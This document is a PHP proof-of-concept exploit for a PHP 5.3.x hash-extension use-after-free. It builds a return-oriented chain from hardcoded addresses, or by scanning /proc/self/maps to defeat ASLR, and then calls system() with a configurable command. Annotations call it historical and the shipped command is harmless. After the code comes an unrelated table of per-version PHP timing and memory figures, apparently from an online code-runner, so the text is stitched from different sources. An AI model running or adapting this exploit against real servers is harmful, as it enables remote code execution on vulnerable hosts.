<?php
/*
 * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com>
 *
 * PHP 5.3.x Linux x86-64 arbitrary code execution
 *
 * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012)
 *
 * NOTES:
 * Most distro's ship with PIE compiled httpd's these days, and everyone
 * seems to favour php5 as module rather than using php-cgi. This puts us
 * in an annoying position for doing Return-oriented-whatever.
 *
 * So the bad news is this exploit only works without restrictions against
 * machines that use php5-cgi and where gadgets have already been identified.
 *
 * However, the good news is if PHP doesn't enforce open_basedir restrictions
 * there's still a fat chance this exploit will succeed by parsing /proc/self/maps
 * to circumvent ASLR and identify gadgets during runtime by scanning libraries.
 *
 * Reviewer note: historical proof-of-concept for the MOPS-2010-001 hash
 * extension bug (a user-space stream wrapper calling hash_final() on the
 * context that hash_update_file() is still using). The 5.3.x builds named
 * below are long unsupported; the remediation is a patched PHP, keeping
 * open_basedir enforced, and not exposing the interpreter to untrusted
 * script authors. Comments only - no code below is changed.
 */
error_reporting(E_ALL);

// Command the payload attempts to run if the chain works (harmless as shipped).
$CMD = "php-4.3.0 --version";

/**
 * Unpacks little-endian fixed-width fields from $data, in order.
 *
 * @param array  $fmt  ordered map of field name => 'u16' | 'u32' | 'u64'
 * @param string $data raw bytes, consumed sequentially from offset 0
 * @return array field name => integer value
 */
function ustruct($fmt, $data) {
    $out = array();
    $pos = 0;
    // unpack() codes: S = unsigned 16-bit (machine order), V = unsigned 32-bit
    // little-endian; a u64 is read as two 32-bit halves and recombined below.
    $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2');
    $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 );
    foreach($fmt as $name => $type) {
        $v = unpack($upack[$type], substr($data, $pos, $sizes[$type]));
        if ($type == 'u64')
            $v = ($v[2] << 32) | $v[1]; // needs a 64-bit PHP build
        else
            $v = $v[1];
        $out[$name] = $v;
        $pos += $sizes[$type];
    }
    return $out;
}

/**
 * Parses the ELF64 header and section table of $filename and returns the
 * sections whose flags have bit 4 (SHF_EXECINSTR) set, each extended with
 * its name ('str') and raw bytes ('data').
 *
 * No validation is performed: the file is assumed to be a readable ELF64
 * image, and a false return from file_get_contents() is not checked.
 *
 * @param string $filename path of an ELF object (library or executable)
 * @return array list of section records
 */
function get_sections($filename) {
    // Elf64_Ehdr layout (0x40 bytes); e_ident is split into two u64s.
    $elf64_header = array(
        'e_ident0' => 'u64', 'e_ident1' => 'u64',
        'type' => 'u16', 'machine' => 'u16', 'version' => 'u32',
        'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64',
        'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16',
        'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16',
        'shstrndx' => 'u16'
    );
    // Elf64_Shdr layout.
    $elf64_sh = array(
        'name' => 'u32', 'type' => 'u32', 'flags' => 'u64',
        'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64',
        'link' => 'u32', 'info' => 'u32', 'align' => 'u64',
        'entsize'=> 'u64'
    );
    $buf = file_get_contents($filename);
    $hdr = ustruct($elf64_header, substr($buf, 0, 0x40));
    echo "[>>] $filename\n";
    $sections = array();
    for($i = 0; $i < $hdr['shnum']; $i++) {
        $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']);
        $sections[] = ustruct($elf64_sh, $data);
    }
    // Section-name string table; each section's 'name' is an offset into it.
    $str_section = $sections[ $hdr['shstrndx'] ];
    $ret_sections = array();
    for($i = 0; $i < count($sections); $i++) {
        if (!($sections[$i]['flags']&4)) continue; // executable sections only
        $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) );
        $sections[$i]['str'] = $v[0];
        $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']);
        $ret_sections[] = $sections[$i];
    }
    return $ret_sections;
}

/**
 * Searches $data for each byte pattern in $gg.
 *
 * @param array  $gg   name => pattern string, or name => list of alternatives
 * @param string $data haystack bytes
 * @param int    $base added to every match offset
 * @return array name => $base + offset of the first occurrence; names with no
 *               match are omitted; when several alternatives match, the last
 *               alternative in the list wins
 */
function find_gadgets($gg, $data, $base=0) {
    $ret = array();
    foreach($gg as $name => $patterns) {
        if (!is_array($patterns)) $patterns = array($patterns);
        foreach($patterns as $pattern) {
            if (($pos = strpos($data, $pattern)) !== false) {
                $ret[$name] = $base+$pos;
            }
        }
    }
    return $ret;
}

/**
 * Encodes $v as 8 little-endian bytes (two 32-bit halves).
 *
 * @param int $v value to encode
 * @return string 8 raw bytes
 */
function w64($v) {
    return pack("V", $v & 0xffffffff) . pack("V", $v >> 32);
}

// The fixed-address table is only consulted under php-cgi (detected from the
// ORIG_SCRIPT_* server variables). $resolve is assigned but never read; the
// fallback scan below is actually keyed on whether $addy got set.
$resolve = true;
if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) {
    $resolve = false;
    // distro build string (phpversion()) => eight addresses, consumed
    // positionally in the order of the second $ropvar list further down.
    // The last entry is commented out; the closing `);` must stay on its own line.
    $cgirop = array(
        "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20),
        "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260),
        "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970),
        //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476,
    );
    $v = phpversion();
    if (!isset($cgirop[$v])) {
        echo "plz2portgadgets: ".$v."\nattempting fallback!\n";
        $resolve = true;
    } else
        $addy = $cgirop[$v];
}

if (!isset($addy)) {
    // Fallback: byte signatures searched for in the executable sections of
    // every mapped object listed in /proc/self/maps (this is why the header
    // says open_basedir enforcement matters - it blocks reading those files).
    $patterns = array(
        'ADDRSP' => "\x48\x83\xc4\x28\xc3",
        'POPRAX' => "\x58\xc3",
        'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", "\x48\x8d\x7c\x24\x18\xff\xe0" ),
        'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16"
    );
    $maps = explode("\n", file_get_contents("/proc/self/maps") );
    $gadgets = array();
    foreach($maps as $map) {
        // maps fields: address-range perms offset dev inode [path]
        $map = explode(" ", preg_replace('!\s+!', ' ', $map));
        if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue;
        // once a single pattern is left, only libc mappings are scanned
        if (count($patterns) == 1 && !strstr($map[5], "libc")) continue;
        $exec_sections = get_sections($map[5]);
        $tmp = explode("-", $map[0]);
        $page_offs = hexdec($tmp[0]); // mapping start, added back to file offsets
        foreach($exec_sections as $section) {
            $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] );
            foreach($new_gadgets as $name => $offs) {
                if (isset($patterns[$name])) {
                    printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs);
                    unset($patterns[$name]); // first hit per name wins
                    $new_gadgets[$name] += $page_offs;
                }
            }
            if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets);
            if (count($patterns) == 0) {
                echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n";
                break 2;
            }
        }
    }
    $addy = $gadgets;
}

// Expose each address as a global named after its role, encoded with w64().
// NOTE: `$$ropvar[$i]` relies on PHP 5 reading it as ${$ropvar[$i]}; from
// PHP 7 on the same text parses as ${$ropvar}[$i], so these globals are never
// populated there (the script only targets 5.3.x).
if (isset($gadgets)) {
    // scan result: keyed by name, four entries
    $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]);
        $$ropvar[$i] = w64($addy[ $ropvar[$i] ]);
    }
} else {
    // table result: positional, eight entries
    $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA');
    for($i = 0; $i < count($ropvar); $i++) {
        printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]);
        $$ropvar[$i] = w64($addy[ $i ]);
    }
}
// The size check comes after the loops above have already indexed into $addy.
if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n");

/**
 * Minimal user-space stream wrapper, registered as evil:// below.
 * Only stream_read() does anything: it finalises the hash context that the
 * pending hash_update_file() call is still reading into (the already-freed
 * resource bug the header attributes to MOPS-2010-001) and then returns the
 * prepared chain as the "file contents".
 */
class evil_stream {
    function stream_open($a, $b, $c, &$e) { return 1; }
    function stream_eof() { return 0; }
    function stream_seek($offset, $whence) { return 0; }
    function stream_read($count) {
        global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM;
        // $hid is the context created by hash_init() at the bottom of the
        // file; finalising it here, mid hash_update_file(), is the trigger.
        hash_final($GLOBALS['hid'], false);
        $GLOBALS['a'] = str_repeat($ADDRSP, 3); // add 40, rsp
        // $SYSTEM only exists after the /proc/self/maps scan (4-entry
        // variant); the 8-entry table variant uses GOTENTRY/LIBCDELTA instead.
        if (isset($SYSTEM) && !empty($SYSTEM))
            return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00";
        else
            return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00";
    }
}

stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n");
$hid = hash_init('md5');
// Reading evil://code drives evil_stream::stream_read() while this call still
// holds $hid. Reaching the echo means the chain did not take over (i.e. the
// interpreter is not vulnerable or the addresses were wrong).
hash_update_file($hid, "evil://code");
echo "you goofed up\n";
?>

Here you find the average performance (time & memory) of each version. A grayed-out version indicates that the run did not complete successfully (based on its exit code).

Version | System time (s) | User time (s) | Memory (MiB)
7.2.100.1160.00715.29
7.2.90.0780.00315.28
7.2.80.1110.01015.21
7.2.70.0860.00315.49
7.2.60.0940.00715.38
7.2.50.1020.01315.38
7.2.40.0940.00315.48
7.2.30.0840.00715.38
7.2.20.0580.00915.51
7.2.10.0840.00715.58
7.2.00.0610.00915.32
7.1.220.0580.00613.95
7.1.210.0660.00314.25
7.1.200.0690.00414.21
7.1.190.0820.01014.21
7.1.180.1190.00314.39
7.1.170.0670.00614.27
7.1.160.0880.00614.39
7.1.150.0080.01614.30
7.1.140.0680.01214.21
7.1.130.0890.00914.30
7.1.120.0720.01014.39
7.1.110.0820.00714.23
7.1.100.0890.01014.37
7.1.90.0640.00614.23
7.1.80.1050.00314.29
7.1.70.0880.00314.39
7.1.60.1320.00932.36
7.1.50.0310.01332.28
7.1.40.0460.00631.93
7.1.30.1230.00032.12
7.1.20.0350.00632.14
7.1.10.0870.01514.38
7.1.00.0740.00014.40
7.0.310.0680.01013.90
7.0.300.0950.01013.83
7.0.290.0130.00913.55
7.0.280.1030.00713.80
7.0.270.0820.00713.99
7.0.260.0870.00013.99
7.0.250.0800.00013.81
7.0.240.0880.00413.75
7.0.230.0590.00614.03
7.0.220.1210.01013.97
7.0.210.0080.01513.54
7.0.200.0110.00713.93
7.0.190.0570.00413.57
7.0.180.0080.00514.09
7.0.170.0080.00813.72
7.0.160.0150.00913.93
7.0.150.0090.00613.70
7.0.140.0420.00313.95
7.0.130.1440.00613.91
7.0.120.1240.00713.85
7.0.110.0180.00013.76
7.0.100.0040.01313.62
7.0.90.1240.00713.89
7.0.80.1260.01013.88
7.0.70.0880.00613.96
7.0.60.0590.01113.61
7.0.50.2070.00913.91
7.0.40.0590.00913.77
7.0.30.1510.00613.97
7.0.20.1500.00613.87
7.0.10.1590.00314.00
7.0.00.0870.00313.74
5.6.380.0030.01014.41
5.6.370.0100.00714.74
5.6.360.0190.00414.66
5.6.350.0180.00614.75
5.6.340.0090.01414.39
5.6.330.0190.00414.69
5.6.320.0110.00814.69
5.6.310.0120.00614.48
5.6.300.0090.00614.67
5.6.290.0100.00314.42
5.6.280.0090.00614.30
5.6.270.0150.00414.53
5.6.260.0110.00614.29
5.6.250.0120.00414.41
5.6.240.0110.00414.44
5.6.230.0030.01214.18
5.6.220.0110.00314.50
5.6.210.0090.00614.39
5.6.200.0140.00014.40
5.6.190.0030.01514.56
5.6.180.0060.00614.40
5.6.170.0100.00614.70
5.6.160.0040.01314.59
5.6.150.0050.01014.63
5.6.140.0040.00914.55
5.6.130.0150.00414.62
5.6.120.0150.00414.28
5.6.110.0060.00614.23
5.6.100.0000.01414.41
5.6.90.0090.00314.50
5.6.80.0080.00814.48
5.6.70.0000.01214.45
5.6.60.0000.01314.38
5.6.50.0000.01414.57
5.6.40.0090.00714.46
5.6.30.0090.00414.49
5.6.20.0030.01514.32
5.6.10.0120.00314.46
5.6.00.0120.01014.42
5.5.380.0340.06433.55
5.5.370.0300.05733.03
5.5.360.0300.06733.02
5.5.350.0300.05828.23
5.5.340.0610.03428.39
5.5.330.0400.07033.14
5.5.320.0430.04333.30
5.5.310.0420.04433.49
5.5.300.0380.05232.90
5.5.290.0400.05633.36
5.5.280.0580.03633.29
5.5.270.0220.05933.19
5.5.260.0290.05633.69
5.5.250.0320.05233.11
5.5.240.0430.04332.69
5.5.230.0310.05132.76
5.5.220.0360.04832.61
5.5.210.0380.04532.82
5.5.200.0450.04632.66
5.5.190.0320.05732.75
5.5.180.0430.05332.54
5.5.170.0060.00914.21
5.5.160.0450.04732.48
5.5.150.0450.04532.37
5.5.140.0480.04232.86
5.5.130.0310.06232.34
5.5.120.0290.05532.75
5.5.110.0370.05532.55
5.5.100.0490.07332.55
5.5.90.0580.05832.18
5.5.80.0350.05632.45
5.5.70.0360.06832.54
5.5.60.0430.06032.16
5.5.50.0270.06032.28
5.5.40.0260.05932.54
5.5.30.0360.05832.42
5.5.20.0420.05432.77
5.5.10.0430.04332.55
5.5.00.0360.06632.34
5.4.450.0390.04632.70
5.4.440.0440.04432.58
5.4.430.0320.06032.93
5.4.420.0380.04732.86
5.4.410.0290.06132.79
5.4.400.0330.05332.43
5.4.390.0320.05232.34
5.4.380.0430.04032.44
5.4.370.0390.05932.57
5.4.360.0400.07332.55
5.4.350.0350.05632.46
5.4.340.0210.06432.33
5.4.330.0290.06132.16
5.4.320.0220.06432.40
5.4.310.0540.04132.54
5.4.300.0360.07032.26
5.4.290.0380.05932.61
5.4.280.0420.04232.55
5.4.270.0350.05532.41
5.4.260.0510.06132.44
5.4.250.0430.06332.41
5.4.240.0480.04832.26
5.4.230.0330.06232.23
5.4.220.0470.05032.60
5.4.210.0400.06232.52
5.4.200.0330.05632.40
5.4.190.0280.06532.42
5.4.180.0320.06132.41
5.4.170.0480.05132.07
5.4.160.0300.06432.42
5.4.150.0350.05532.38
5.4.140.0520.03731.59
5.4.130.0390.05431.77
5.4.120.0330.05831.93
5.4.110.0430.06132.03
5.4.100.0410.05132.05
5.4.90.0460.05232.16
5.4.80.0340.06232.11
5.4.70.0330.05431.92
5.4.60.0300.05232.09
5.4.50.0290.05532.14
5.4.40.0500.05732.40
5.4.30.0310.05631.95
5.4.20.0400.06132.29
5.4.10.0270.06031.82
5.4.00.0380.05731.45
5.3.290.0290.06224.33
5.3.280.0270.06023.90
5.3.270.0290.05224.32
5.3.260.0390.02824.40
5.3.250.0310.04124.31
5.3.240.0280.05024.23
5.3.230.0230.04724.13
5.3.220.0250.05723.93
5.3.210.0390.03524.16
5.3.200.0420.03924.28
5.3.190.0270.05024.34
5.3.180.0280.04624.31
5.3.170.0290.04024.11
5.3.160.0290.04024.26
5.3.150.0250.03924.38
5.3.140.0240.06824.38
5.3.130.0140.05824.24
5.3.120.0160.05923.99
5.3.110.0280.03724.19
5.3.100.0180.05223.74
5.3.90.0440.04923.75
5.3.80.0260.04123.37
5.3.70.0310.03823.59
5.3.60.0310.04123.67
5.3.50.0350.03523.54
5.3.40.0240.04623.59
5.3.30.0340.04023.31
5.3.20.0310.01423.04
5.3.10.0270.03022.97
5.3.00.0160.03322.81
